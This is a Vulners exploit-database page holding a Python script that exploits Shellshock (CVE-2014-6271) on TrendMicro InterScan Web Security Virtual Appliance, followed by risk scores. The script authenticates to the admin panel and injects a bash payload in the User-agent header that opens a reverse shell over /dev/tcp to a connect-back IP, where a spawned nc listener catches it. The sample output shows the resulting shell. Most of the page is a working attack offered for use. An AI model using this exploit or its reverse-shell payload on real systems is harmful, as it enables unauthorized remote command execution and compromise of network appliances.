Vulners
Lucene search
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command Injection
10
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os
def spawn_listener():
os.system("nc -l 8080")
def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie
if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Oct 2016 00:00Current
10High risk
Vulners AI Score10
CVSS 3.19.8
CVSS 210
EPSS0.9422
SSVC